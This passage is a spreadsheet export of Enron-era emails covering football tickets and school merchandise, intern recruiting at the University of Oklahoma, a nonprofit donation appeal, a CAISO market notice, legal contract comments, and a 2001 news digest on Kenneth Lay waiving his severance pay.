to Bigtimesports.com and look at the styles. I think they are also in the_x000D_
school colors. If you see a style you like, let me know the size shape and_x000D_
school and I can order it. If some of it is for you, let me know, as they_x000D_
have different styles for women. Also, I can have logo's etc. reduced (like_x000D_
I did on your Bevo on your shirt) so they are not so big. I always have them_x000D_
reduce the OU from 1 3/4" to a_x000D_
1 1/4" size, so I don't look like a "poster boy" for OU. Anyway, let me know_x000D_
and I will order them for you._x000D_
_x000D_
Let me know when you hear back from Lexi about your discussion relative to_x000D_
summer internship recruiting._x000D_
_x000D_
_x000D_
_x000D_
Ted K. Jacobs_x000D_
Director of Energy Management_x000D_
The University of Oklahoma_x000D_
307 West Brooks, Room 218_x000D_
Norman, OK  73019-4007_x000D_
(405)325-0758_x000D_
Fax (405)325-2096_x000D_
E-mail: tjacobs@ou.edu_x000D_
Website: www.ou.edu/business/em_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sally.Beck@enron.com [mailto:Sally.Beck@enron.com]_x000D_
Sent: Monday, September 25, 2000 1:23 PM_x000D_
To: Jacobs, Ted K_x000D_
Subject: RE: Oklahoma Trip_x000D_
_x000D_
_x000D_
_x000D_
Thanks for looking into the OU/Texas tickets for us.  With the ages of the_x000D_
kids, I think that we will pass on those single tickets.  The kids love our_x000D_
home tradition for the game, and weren't sure that they wanted to give that_x000D_
up. (I have cake pans in the shape of the state of Texas and the state of_x000D_
Oklahoma - one daugther decorates one, and the other decorates the second_x000D_
cake - add some bean dip and chips and it's our own version of a tailgate_x000D_
party!)_x000D_
_x000D_
We were hoping to bring Meagan up to look at OU this fall, with our eye on_x000D_
that last game of the season. However, Klein High School has started the_x000D_
football season very strongly, winning all games to date.  That means that_x000D_
we may be headed for high school playoffs again this year.  Meagan is on_x000D_
the drill team and must be at all games.  Last year, we played right up to_x000D_
Thanksgiving in the playoffs.  So, we have decided to pick a weekend in the_x000D_
spring after drill team contest season is over to make that trip with_x000D_
Meagan._x000D_
_x000D_
We are interested in caps, shirts, etc. for UT, OU and Texas Tech.  Do you_x000D_
have a list of what is available for those schools?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Jacobs, Ted K" &lt;tjacobs@ou.edu&gt; on 09/23/2000 03:07:11 PM_x000D_
_x000D_
To:   "'Sally.Beck@enron.com'" &lt;Sally.Beck@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: Oklahoma Trip_x000D_
_x000D_
_x000D_
Thanks for the nice words. I hope Enron will be able to look at some_x000D_
students for summer internships, as I am sure they will be gone by Spring._x000D_
_x000D_
As far as Texas tickets go, I can come up with 5 singles, but not 5_x000D_
together_x000D_
or even 3 and 2. Let me know if interested and I will try to get them._x000D_
Might_x000D_
be able to trade up or something._x000D_
_x000D_
Let me know what other schools you are talking about and I can find out for_x000D_
you._x000D_
_x000D_
Again, thank you for taking time out your schedule to come up and be a part_x000D_
of the OU recruiting effort. It has been your support and efforts that we_x000D_
have to thank for Enron coming to OU. Keep me posted on what you work out_x000D_
with HR with regards to summer interns._x000D_
_x000D_
"Hook Em"_x000D_
_x000D_
Ted K. Jacobs_x000D_
Director of Energy Management_x000D_
The University of Oklahoma_x000D_
307 West Brooks, Room 218_x000D_
Norman, OK  73019-4007_x000D_
(405)325-0758_x000D_
Fax (405)325-2096_x000D_
E-mail: tjacobs@ou.edu_x000D_
Website: www.ou.edu/business/em_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sally.Beck@enron.com [mailto:Sally.Beck@enron.com]_x000D_
Sent: Friday, September 22, 2000 5:30 PM_x000D_
To: Jacobs, Ted K_x000D_
Subject: Oklahoma Trip_x000D_
_x000D_
_x000D_
_x000D_
It was good to see you in Norman earlier this week.  As always, I_x000D_
appreciated your attendance at the presentation and at Coach's afterwards._x000D_
I am sure that it is rewarding for you to see former students such as Jody_x000D_
and Nate participating on the other side of the recruiting table.  You have_x000D_
done a great job in changing and promoting the program._x000D_
_x000D_
I am pushing Lexi to resolve the question around interview dates for summer_x000D_
interns ASAP.  I have also left Mike McConnell a message to make him aware_x000D_
of the issue.  I should be able to get back with you next week, hopefully_x000D_
with a change in our strategy!_x000D_
_x000D_
If you do become aware of five OU /Texas tickets, please let me know.  We_x000D_
will certainly purchase them, I just made the assumption that all tickets_x000D_
may already be sold._x000D_
_x000D_
On another note, David has worn his OU shirt to work and has gotten lots of_x000D_
compliments.  He has a number of people that have asked him about school_x000D_
shirts, caps, etc.  Do you have a list of the schools that you can get_x000D_
merchandise for and the types of merchandise that you can get?  Let me know_x000D_
-- we can probably place a few orders through you!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 10 Dec 2000 06:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'coordinator@medhelp.org'})</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Susan Scott,_x000D_
_x000D_
We hope that your visits to our web site (www.medhelp.org) have been helpful _x000D_
and that you were able to obtain useful information from our libraries and _x000D_
our Ask the Doctor  forums (Addiction, Child Behavioral Health, Dermatology, _x000D_
Heart, Gastroenterology, Hepatitis, Mental Health, Neurology, Urology)._x000D_
_x000D_
Did you know that it costs us as much as $25 for questions that are answered _x000D_
in these forums?_x000D_
_x000D_
Within the past six years, Med Help International, a non-profit _x000D_
organization,  has become one of the world's largest sources for consumer _x000D_
health information.  Our site regularly receives more than 5 million hits per _x000D_
month. Right now we need a little help from friends like you in order to _x000D_
continue our services (and hopefully expand them).  Med Help does not receive _x000D_
government funding or foundation grants ....we rely upon donations from _x000D_
people like you._x000D_
_x000D_
We want to always be here for you!  If you are in a position to make even a _x000D_
small  donation we sure can use your support. All contributions are tax _x000D_
deductible and may be mailed to:_x000D_
_x000D_
Med Help International_x000D_
3830 South Highway A1A_x000D_
Suite C3, PMB #117_x000D_
Melbourne Beach, Florida 32951_x000D_
_x000D_
Best Regards,_x000D_
Cindy and Phil_x000D_
Founders_x000D_
Med Help International_x000D_
_x000D_
_x000D_
PS- For tax purposes, if you need our non-profit ID number, please send us _x000D_
your request via email to: staff@medhelp.org, and we will send our Federal ID _x000D_
# to you._x000D_
_x000D_
PPS- This is a one time mailer, if you want to be permanently removed from _x000D_
our database send email to: unsubscribe@medhelp.org_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 10:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAISO Notice - Comprehensive Market Redesign - Template for Comme_x000D_
 nts on Congestion Management Reform</t>
  </si>
  <si>
    <t xml:space="preserve">  Market Participants:_x000D_
_x000D_
  The ISO has posted on its web site a template for your use_x000D_
in submitting your final comments on the ISO's Congestion Management Reform_x000D_
Recommendation that is part of its Comprehensive Market Redesign.  The_x000D_
template is posted at http://www.caiso.com/clientserv/congestionreform.html_x000D_
&lt;http://www.caiso.com/clientserv/congestionreform.html&gt; .  Final comments_x000D_
are due to bwoertz@caiso.com &lt;mailto:bwoertz@caiso.com&gt;  by 5:00 p.m. PDT on_x000D_
Thursday, August 31.  We will include a summary of all comments received to_x000D_
the ISO Governing Board as part of the CMR Recommendation for their_x000D_
approval._x000D_
_x000D_
  Please note that the template asks you to identify the name_x000D_
of  the person submitting comments, the name of your organization (please_x000D_
limit comments to one set per organization) and whether you would like to_x000D_
have your comments posted on the ISO web site._x000D_
_x000D_
  Please contact me if you have any questions._x000D_
_x000D_
  Byron Woertz_x000D_
  Director, Client Relations_x000D_
  (916) 608-7066</t>
  </si>
  <si>
    <t>Tue, 22 May 2001 14:14:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bracewell &amp; Patterson</t>
  </si>
  <si>
    <t>George Parker_x000D_
210-299-3507_x000D_
W: Julie_x000D_
_x000D_
Tullos Wells_x000D_
210-299-3528_x000D_
W: Carrie</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 05:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'csaunders@ou.edu'})</t>
  </si>
  <si>
    <t>Re: an invitation</t>
  </si>
  <si>
    <t xml:space="preserve">Mike McConnell has been out of the office traveling on business and he asked _x000D_
me to respond to your message on his behalf.  Mike asked me to pass along his _x000D_
sincere thanks for your message and for the invitation, however, he moved out _x000D_
of Enron Net Works and the technology area of Enron effective last August and _x000D_
is no longer involved in that area of the business.  _x000D_
_x000D_
Please note that by way of this message, I am sending a copy to Philippe _x000D_
Bibi, CEO, Enron Net Works.  You may contact Philippe if you are interested _x000D_
in obtaining a speaker from the technology area of Enron.  _x000D_
_x000D_
Thank you again._x000D_
_x000D_
Cathy Phillips for_x000D_
Mike McConnell_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Saunders, Carol S" &lt;csaunders@ou.edu&gt; on 04/20/2001 12:41:46 PM_x000D_
To: "'mike.mcconnell@enron.com'" &lt;mike.mcconnell@enron.com&gt;_x000D_
cc:  _x000D_
Subject: an invitation_x000D_
_x000D_
Mr. McConnell,_x000D_
_x000D_
I am a Management Information Systems professor at the University of_x000D_
Oklahoma.  I heard you speak about EnronOnline approximately a year ago_x000D_
during one of your visits to the University of Oklahoma.  I was captivated_x000D_
by your talk and continue to be impressed with EnronOnline's success in the_x000D_
world of e-business._x000D_
_x000D_
With this email I am inviting you to serve on a panel that I am assembling_x000D_
for the International Conference on Information Systems (ICIS) in New_x000D_
Orleans, Louisiana on December 16-19, 2001.   ICIS is the premiere_x000D_
conference for IS academicians and is described at_x000D_
http://isds.bus.lsu.edu/icis2001/ Approximately 1200 IS researchers and_x000D_
professors from around the world, as well as IS practitioners, are expected_x000D_
to attend this year's conference. Thus, this conference has a very broad_x000D_
reach within the IS academic community. The panel would be a wonderful venue_x000D_
to share with the IS research and teaching community the e-business inroads_x000D_
that EnronOnline is making.  _x000D_
_x000D_
The topic of the panel would be to explore your projections and that of the_x000D_
other panelists about how electronic exchanges may morph over the next five_x000D_
years.  You would also be asked to describe the business model used by_x000D_
EnronOnline, and talk about factors promoting its success and issues_x000D_
warranting attention for its future growth. _x000D_
_x000D_
The other three panelists would be myself, Arun Rai (Professor at the_x000D_
eCommerce Institute at Georgia State University), and Marshall McGraw_x000D_
(Business Services Manager for Information &amp; Technology Services at Phillips_x000D_
Petroleum).  The panel would last approximately 11/2 hours, but I would not_x000D_
know the specific day (i.e., Dec 17th, 18th or the morning of Dec 19th)_x000D_
until early Fall._x000D_
_x000D_
I would like to call you and talk with you about your interest in serving on_x000D_
the panel.  I will call you on Monday (after you have had some time to_x000D_
recover from your latest trip to Norman)._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Carol Saunders_x000D_
W.P. Wood Professor of MIS_x000D_
University of Oklahoma_x000D_
405-325-5732 (work)_x000D_
405-579-8940 (home)_x000D_
405-325-7482 (fax)_x000D_
csaunders@ou.edu_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 01:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeldredge@velaw.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Carol St Clair/HOU/ECT on 05/08/2000 _x000D_
08:45 AM ---------------------------_x000D_
_x000D_
_x000D_
Carol St Clair_x000D_
05/08/2000 08:45 AM_x000D_
To: _x000D_
cc: acurry@velaw.com, Mark Evans/LON/ECT@ECT _x000D_
Subject: Swap Assignment Agreement - April 20 Draft_x000D_
_x000D_
Jeff:_x000D_
Were the following points considered or discussed prior to them turning the _x000D_
last draft?  The cross default langugae still does not work.  Why was the _x000D_
threshold lowered to $50,000,000?_x000D_
_x000D_
Alicia:_x000D_
What are your thoughts on this?_x000D_
_x000D_
Carol _x000D_
---------------------- Forwarded by Carol St Clair/HOU/ECT on 05/08/2000 _x000D_
08:42 AM ---------------------------_x000D_
_x000D_
_x000D_
Carol St Clair_x000D_
04/28/2000 10:23 AM_x000D_
To: jeldredge@velaw.com_x000D_
cc: acurry@velaw.com _x000D_
Subject: Swap Assignment Agreement - April 20 Draft_x000D_
_x000D_
Jeff:_x000D_
Sorry this took so long but here are my thoughts on the above:_x000D_
_x000D_
1. In Section 3.1 (c), I'm assuming that the additional sections were added _x000D_
because we will get these reps in another agreement from the Trust.  Is that _x000D_
correct?_x000D_
_x000D_
2. In Section 3.4 e), the new language regarding rescission of acceleration I _x000D_
think belongs after the phrase that begins, "if the effect of such _x000D_
failure..."  Also, where did the new language regarding prepayments at the _x000D_
end come from?  Is this in the Revolver or in Enron's existing deals? _x000D_
_x000D_
3. Section 3.11 should be made subject to Section 5.7 or vice versa._x000D_
_x000D_
Carol_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 06:15:35 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron's Lay Turns Down Severance Pay_x000D_
The Wall Street Journal, 11/14/01_x000D_
Enron CEO Cut Stakes in Firms Where He Sits in Director's Seat_x000D_
The Wall Street Journal, 11/14/01_x000D_
Enron Chief Will Give Up Severance_x000D_
The New York Times, 11/14/01_x000D_
COMPANIES &amp; FINANCE THE AMERICAS - Regulators face new boundaries in Enron deal._x000D_
Financial Times, 11/14/01_x000D_
FRONT PAGE - COMPANIES &amp; MARKETS: Enron chief will turn down Dollars 60m takeover windfall _x000D_
Financial Times; Nov 14, 2001_x000D_
_x000D_
Enron Chief Relinquishes Severance Pay_x000D_
Los Angeles Times, 11/14/01_x000D_
Enron CEO Says No to $60.6 Million_x000D_
The Washington Post, 11/14/01_x000D_
Enron's Lay Sells Shareholdings in Other Companies, WSJ Reports_x000D_
Bloomberg, 11/14/01_x000D_
_x000D_
Greenspan takes on energy at Rice award presentation_x000D_
Houston Chronicle, 11/14/01_x000D_
USA: Enron's Lay says no to hefty pay package._x000D_
Reuters English News Service, 11/14/01_x000D_
Enron Chairman Lay Decides to Forgo $60.6 Million Severance Payment_x000D_
Dow Jones Business News, 11/14/01_x000D_
Enron chairman says he won't take dlrs 60 million compensation package if Dynegy deal closes_x000D_
Associated Press Newswires, 11/14/01_x000D_
Enron CEO to turn down $60.6 million severance pay_x000D_
Houston Chronicle, 11/14/01_x000D_
Enron offers reasons for selling to Dynegy_x000D_
Houston Chronicle, 11/14/01_x000D_
Enron chief may hit jackpot CEO's contract calls for a giant payout if control changes_x000D_
The Globe and Mail, 11/14/01_x000D_
City - Enron chief in line for $60m payout._x000D_
The Daily Telegraph, 11/14/01_x000D_
MARK TO MARKET: Retail Sales To Surge On Free Money_x000D_
Capital Markets Report, 11/14/01_x000D_
Just stick it out or be a sucker_x000D_
The Economic Times, 11/14/01_x000D_
Deal made; now Dynegy must make it work_x000D_
Chicago Tribune, 11/14/01_x000D_
Dynegy defends merger partner ; CEO says Enron errors not illegal_x000D_
Chicago Tribune, 11/14/01_x000D_
USA: UPDATE 1-Calpers calls on Enron board to step aside in merger._x000D_
Reuters English News Service, 11/13/01_x000D_
Enron CEO helps present Greenspan award_x000D_
Associated Press Newswires, 11/13/01_x000D_
CalPERS Opposes Enron Board Members' Appt To Dynegy Board_x000D_
Dow Jones Energy Service, 11/13/01_x000D_
Jesse Jackson Asks Energy Companies to Hire More Minorities_x000D_
Dow Jones Business News, 11/13/01_x000D_
CalPERS Speaks Out On Enron_x000D_
Business Wire, 11/13/01_x000D_
Enron Names Raymond Bowen Treasurer_x000D_
Dow Jones News Service, 11/13/01_x000D_
USA: Enron names Raymond Bowen treasurer._x000D_
Reuters English News Service, 11/13/01_x000D_
USA: Enron earnings restatement a sign of deceit-suits._x000D_
Reuters English News Service, 11/13/01_x000D_
USA: S&amp;P says Dynegy deal saves Enron from junk rating._x000D_
Reuters English News Service, 11/13/01_x000D_
_x000D_
Enron's Board Should Step Aside From New Company, Calpers Says_x000D_
Bloomberg, 11/13/01_x000D_
_x000D_
Enron CEO Won't Accept $60.6 Mln in Severance, Spokesman Says_x000D_
Bloomberg, 11/13/01_x000D_
_x000D_
SWITZERLAND: Swiss EWZ suspends planned power venture with Enron._x000D_
Reuters English News Service, 11/14/01_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Enron's Lay Turns Down Severance Pay_x000D_
By Rebecca Smith and John R. Emshwiller_x000D_
Staff Reporters of The Wall Street Journal_x000D_
_x000D_
11/14/2001_x000D_
The Wall Street Journal_x000D_
A3_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
Enron Corp. said its chairman, Kenneth Lay, has decided to forgo a severance payment of $60.6 million that could be triggered by Dynegy Inc.'s planned acquisition of Enron. Mr. Lay's decision capped a day in which he appears to have changed his mind on the matter at least twice. _x000D_
Early in the day, an Enron filing with the Securities and Exchange Commission laid out Mr. Lay's severance package. By midday, Enron indicated that Mr. Lay would keep only one-third of the payout, which he would take in stock in the combined company, and that he intended to donate one-third to a foundation to help displaced Enron employees. The remaining third would cover income-tax liabilities._x000D_
But by the end of the day, Enron spokesman Mark Palmer said that Mr. Lay, following a meeting of Enron energy traders, had decided against taking any of the severance pay. Though Mr. Lay didn't attend the traders' meeting, senior managers told him that "opinions were expressed that he shouldn't receive the payment," Mr. Palmer said. "He decided the cleanest thing to do was to waive the payment." The opinions of traders carry particular weight because they produce most of Enron's profits. Questions for Mr. Lay were directed to Mr. Palmer, who said he had spoken with Mr. Lay and other company officials during the day. _x000D_
The initial disclosure about Mr. Lay's hefty severance payment raised new questions about his willingness to sell Enron for a share price that was about a third of the market price of a month ago. Last Friday, Mr. Lay even said that Enron had other options to the Dynegy purchase, which might have allowed the energy company to remain independent, though he declined to elaborate. "Things weren't desperate . . . we had alternatives," Mr. Lay said. The 59-year-old Mr. Lay won't have an executive position at the combined company, though he might be a director. _x000D_
For the 12 months ended Aug. 31, Mr. Lay received about $70 million through the exercise of Enron options, according to disclosure reports compiled by Thomson Financial. Last year, Mr. Lay was paid $8.3 million in salary and bonus and more than $10 million in stock awards and other compensation. _x000D_
Enron, the nation's largest energy trader, saw its stock collapse in recent weeks following a series of disclosures about the company's extensive dealings with partnerships run by some of its own officers. Those dealings are under investigation by the SEC. Last Friday, Enron agreed to be acquired by the far smaller Houston-based Dynegy for stock, currently valued at about $10.7 billion. The merger agreement still must be approved by regulators and shareholders of the two companies. _x000D_
Separately, the California Public Employees' Retirement System, which owns about three million Enron and 500,000 Dynegy shares, said it would oppose the appointment of any current Enron board member to the board of a combined company. Michael Flaherman, chair of CalPERS investment committee said that it appeared that Enron's board "failed in its responsibility" to monitor the activities of Enron executives. _x000D_
Mr. Palmer, the Enron spokesman, said Mr. Lay had provisions in his employment contract to protect him against a sudden change in control from 1989 forward. In February 2000, when Enron stock was trading between $60 and $70 a share and Mr. Lay was being widely lauded for his performance, he negotiated a bigger severance package than he had previously. Last August, when Chief Executive Jeffrey Skilling quit unexpectedly, Mr. Lay assumed Mr. Skilling's duties and his contract term was extended by two years to Dec. 31, 2005. _x000D_
Under the terms of his contract, Mr. Lay is entitled to payment of $20.2 million for every full calendar year left on his employment contract, in the event that his employment terminates within 60 days of a change in control. Thus, Mr. Lay is entitled to three full years of payments, or $60.6 million. _x000D_
Mr. Lay, who took charge of the then-Houston Natural Gas Co. in 1984 when it was a regional pipeline company, wasn't the only member of his family to benefit from Enron's heady rise to a global energy giant. SEC filings show that in recent years a sister of Mr. Lay, Sharon Lay, and a son, Mark Lay, received millions of dollars in salary, commissions and bonuses related to Ms. Lay's travel agency and a paper-products company connected to the younger Mr. Lay. _x000D_
Mr. Palmer said it is a "cheap shot" to criticize the Lay family because the pertinent transactions were reported in several annual proxy statements. "The contracts were bid out and fairly awarded," Mr. Palmer said. Ms. Lay said her travel agency, of which she is president and half-owner, had won its Enron business through competitive bidding and by providing "the very best service possible." Mark Lay couldn't be reached for comment. _x000D_
Coming on top of disclosures of Enron's dealings with partnerships run by its own executives, the relationships between Lay family members and the company again raise questions about Enron's willingness to keep separate corporate and personal interests. Former Chief Financial Officer Andrew Fastow and possibly other Enron executives made millions of dollars from these partnerships. _x000D_
Mark Lay's dealings with Enron date back to 1994, according to the available SEC filings. In May 1997, Mark Lay and "certain other individuals" who together had been officers, directors or shareholders of a company called Paper &amp; Print Management Corp., or PPMC, entered into employment agreements with an Enron unit, Enron Capital &amp; Trade Resources, according to Enron's 1998 proxy statement. The individuals helped set up "a clearinghouse for the purchase and sale of finished paper products," according to the SEC filing. Mr. Palmer said this effort formed the rudiments of Enron's profitable paper and pulp-trading business. _x000D_
As part of the deal, Enron agreed to reimburse PPMC $1 million for certain expenses. Mark Lay and his colleagues also agreed to "convey" to Enron "certain intangible property rights" from PPMC. _x000D_
Mark Lay also got a three-year employment contract from Enron as a vice president of Enron Capital &amp; Trade. He got a signing bonus of $100,000, a minimum monthly salary of $12,500, a minimum annual bonus of $100,000 for 1997-1999 and an option to purchase 20,000 Enron shares. Mark Lay is no longer with Enron and is now attending a seminary, said Mr. Palmer. _x000D_
Since 1985, Sharon Lay's firm, Lay/Wittenberg Travel Agency in the Park Inc., has provided travel arrangements for employees of Enron and its predecessor company. For this work the agency received $6.8 million from 1996 through 2000. In an interview yesterday, Ms. Lay said Enron accounted for more than half of her firm's revenue in some years. She said her brother's position was "more a problem" than an asset since it led some to assume she hadn't worked hard enough to get Enron's business._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Inside Track_x000D_
Enron CEO Cut Stakes in Firms Where He Sits in Director's Seat_x000D_
By Cassell Bryan-Low_x000D_
Staff Reporter of The Wall Street Journal_x000D_
_x000D_
11/14/2001_x000D_
The Wall Street Journal_x000D_
C14_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
Kenneth L. Lay, Enron Corp.'s embattled chairman and chief executive, in recent weeks has cashed in nearly $2 million of shares in companies at which he sits on the board. _x000D_
Mr. Lay, 59 years, sold $1.2 million of shares, or more than a quarter of his holdings, of Compaq Computer Corp., where he has been a director for 14 years. In his first sale of the Houston-based company's shares since 1999, he disposed of 124,596 shares Oct. 29 for $9.25 each, leaving him with a 340,724 share stake. Apart from two directors who resigned, he is the only Compaq insider to have sold shares this year._x000D_
The sale comes as the computer company awaits completion of its planned merger with Hewlett-Packard Co. -- a deal the board has repeatedly said it supports. In a Nov. 7 news release, the board, including Mr. Lay, said it "reaffirmed its strong support for the proposed merger." A day earlier, H-P's founding Hewlett family, which controls 5% of H-P stock, said it intended to oppose the merger, throwing the deal's future into uncertainty. Compaq shares traded at $8.80, up $1.14, as of 4 p.m. in New York Stock Exchange composite trading yesterday. _x000D_
The sale, Mr. Lay said, wasn't related to his views on the merger. "It's no negative [reflection] on Compaq," he said. Mr. Lay, who also sold shares of drug maker Eli Lilly &amp; Co., where he has been a director since 1993, said of both sales, "I needed to have a little more liquidity." _x000D_
On Oct. 31, he sold 10,000 shares of Eli Lilly, Indianapolis, representing roughly a 16% reduction of his holdings, at prices of $77.55 and $77.56 a share, or $775,550 total. That figure is $34,250 above what he paid for the same number of shares Feb. 20 at $74.13 each. After the sale, Mr. Lay owned 54,528 Eli Lilly shares. _x000D_
Eli Lilly shares traded at $78.97, up 75 cents, on the NYSE yesterday. Eli Lilly had no comment on the sales, and Compaq spokesman Arch Currid said, "We don't comment on the personal financial transactions of board members." _x000D_
Mr. Lay also noted that much of his net worth is tied up in Enron, shares of which tumbled by as much as 80% during the past several weeks alone. Enron shocked investors Oct. 16 when it announced a third-quarter loss of $618 million. The Houston energy company has since announced huge write-offs of assets, reductions of shareholder equity, major downward restatements of past earnings reports; and it has disclosed a regulatory probe into its complex transactions with off-balance-sheet partnerships. Shares have recovered some ground since Friday's announcement by Dynegy Inc., a rival Houston independent power producer, of plans to acquire Enron. Shares of Enron traded at $9.98, up 74 cents, or 8%, on the Big Board as of 4 p.m. _x000D_
As previously reported, Mr. Lay sold $25.7 million of his Enron shares this year, as the stock fell from about $78 to under $44, and his remaining stake is valued at about $28 million. For 2000, he earned a salary of $1.3 million, a bonus of $7 million, plus $7.5 million in Enron restricted stock and other benefits, including use of a personal plane, according to Enron's proxy statement. _x000D_
Mr. Lay, who was Enron's CEO from 1985 until February of this year, resumed the post after his successor, Jeffrey Skilling, stepped down in August after only six months on the job. At that time, Mr. Lay agreed to stay on through 2005, but his employment agreement provides for a lump-sum payment under a change of control, such as the proposed merger with Dynegy, according to a regulatory document filed yesterday. The deal is expected to close sometime next year, in which case Mr. Lay would be entitled to $60.6 million under his contract if he terminates his employment within 60 days of the merger. In addition, Mr. Lay is entitled to an amount for any related tax penalties if the payment was deemed to constitute an "excess parachute payment," the filing said. _x000D_
Mr. Lay also serves on the board of EOTT Energy Corp. -- the general partner of EOTT Energy Partners LP -- and NewPower Holdings Co. _x000D_
Mr. Lay also recently sold his stake in i2 Technologies Inc., according to his spokesman, following Mr. Lay's resignation from the board of that company Oct. 25 after serving for a year. As of March 2001, he owned 13,000 shares of the Dallas business-software company, a stake that would have been valued at about $64,000 at the time he resigned. _x000D_
--- _x000D_
Robin Sidel contributed to this article._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
_x000D_
Business/Financial Desk; Section C_x000D_
THE MARKETS: Market Place_x000D_
Enron Chief Will Give Up Severance_x000D_
By RICHARD A. OPPEL Jr. and FLOYD NORRIS_x000D_
_x000D_
11/14/2001_x000D_
The New York Times_x000D_
Page 1, Column 5_x000D_
c. 2001 New York Times Company_x000D_
_x000D_
Trying to quell a furious reaction from employees outraged that he stood to profit from a merger with Dynegy Inc., Kenneth L. Lay, the chairman and chief executive of the Enron Corporation, decided late yesterday to give up a severance package worth more than $60 million. _x000D_
The tumult at Enron's headquarters in Houston began after the company disclosed in a securities filing earlier in the day that Mr. Lay was in line to collect $60.6 million in pay after the deal closed next year, $20.2 million for every full calendar year left in his employment contract._x000D_
Mr. Lay had been a popular leader as Enron grew in the last 15 years from a pipeline operator into the nation's largest energy trader, a business largely of his invention. Employees shared in the gains, though none gained as much as Mr. Lay, who has collected more than $300 million since 1989, mostly through exercising stock options. _x000D_
But the value of employees' stock options and their 401(k) accounts evaporated this fall as Enron shares plummeted amid concerns over the company's accounting practices. And traders and other workers started the day yesterday gossiping angrily about Mr. Lay's severance package. _x000D_
Then, at an afternoon meeting of employees in the company's core natural gas and electricity trading operation, which provides by far the biggest part of Enron's profits, ''quite a bit of concern was raised about the news people had been seeing about this change-of-control payment,'' Mark Palmer, an Enron spokesman, said. _x000D_
At about 4 p.m. Central time, two senior executives who had attended the meeting, John Lavorato and Louise Kitchen, told Mr. Lay about the reaction of employees. ''Ken made a decision shortly thereafter that the best thing to do would be to waive the payment altogether,'' Mr. Palmer said. Even if Dynegy's directors later voted to award Mr. Lay a new severance agreement, he would turn it down, Mr. Palmer added. _x000D_
''What Ken said is that this is the absolute cleanest way to remove any doubts, that he was not going to profit as a result of this change of control,'' Mr. Palmer said. ''This issue was causing enough concern among employees that he wanted to deal with it.'' _x000D_
Severance pay had been an awkward matter for Mr. Lay in the last week. The only reason that Enron was being acquired -- putting the severance clauses in his employment contract into effect -- were the financial problems that have occurred on his watch. The company's shares have lost almost 90 percent of their value after peaking in the summer of 2000. _x000D_
During merger discussions last week, Mr. Lay told Dynegy's chairman, Charles L. Watson, that he wanted to rework the severance package, Mr. Palmer said. On Monday, Mr. Watson disclosed that Mr. Lay wanted much of the severance to be in the form of stock options. _x000D_
By yesterday afternoon, Enron officials were saying that Mr. Lay planned to take two-thirds of the severance in stock or other noncash compensation. And, they said, he wanted to give half of that amount, or one-third of his total package, to establish a charitable foundation to benefit Enron employees. _x000D_
It was about an hour later that Enron said Mr. Lay would give up the severance entirely. _x000D_
Mr. Lay has not decided whether to accept an invitation to be on the board of the combined company, which will be called Dynegy. _x000D_
The deal could still fall victim to antitrust objections or disclosures of further financial problems at Enron. _x000D_
Whether Mr. Lay's gesture will placate Enron's traders, who are now deluging other energy-trading companies with resumes, remains to be seen. Dynegy is known as a much more conservative firm than Enron, and analysts renewed their concerns yesterday about the cultural clash draining the talent, and value, from the combined company. _x000D_
''So much of their top talent is going out the door, I don't know what Dynegy gets,'' said a senior executive at another rival firm. _x000D_
The stunning near-collapse of Enron -- bankruptcy was only averted, some analysts say, by the Dynegy acquisition -- closes a chapter on one of the most influential careers in the history of the energy business. _x000D_
The ugly circumstances of Enron's downfall, including the revelation that partnerships were used to move debt off the company's balance sheet and that Enron overstated profits in the last five years by almost $600 million, have left Mr. Lay's reputation in tatters. _x000D_
Just months ago, Mr. Lay was widely hailed -- or decried, in some circles -- as the genius behind energy deregulation. His friend, George W. Bush, had been elected president, and policies favored by Enron were front and center in the administration's energy policy. Mr. Lay retired from day-to-day management, making plans to pursue new business interests. _x000D_
But he again assumed the chief executive's post at Enron in August, after the unexpected resignation of his handpicked successor, Jeffrey K. Skilling, and the accounting problems swiftly unfolded in the weeks that followed. On Monday, Mr. Lay said he might revive the business plans he set aside during the summer, but he declined to say what those plans were. _x000D_
Even without the severance package, Mr. Lay has become enormously wealthy running Enron. _x000D_
All told, from 1989 through this year, Mr. Lay collected about $13 million in salary (his exact salary for this year is not known) and $26.8 million in cash bonuses. But those sums were dwarfed by the $266.7 million in profits that he received in selling stock. _x000D_
The bulk of his income from exercising options came in the last four years: $13.1 million in 1998, $43.9 million in 1999, $123.4 million in 2000 and $20.7 million this year -- a year in which he sold stock by prearrangement on every trading day through July 31, and then stopped, not wanting to appear to be selling as the stock price was declining. _x000D_
The options he has cashed in recent years, as well as those he now owns, are badly out of the money at Enron's current stock price of $9.98, down from a peak reached in 2000 of $90.75. _x000D_
His bonus in 2000 was $7 million, an award that Enron's board said was based on the company's rising profits and high shareholder return. The company restated those profits last week, explaining that it had improperly applied accounting rules. It said that about 40 percent of its profit in 2000 came from transactions with partnerships that were controlled by Andrew S. Fastow, who was then Enron's chief financial officer. _x000D_
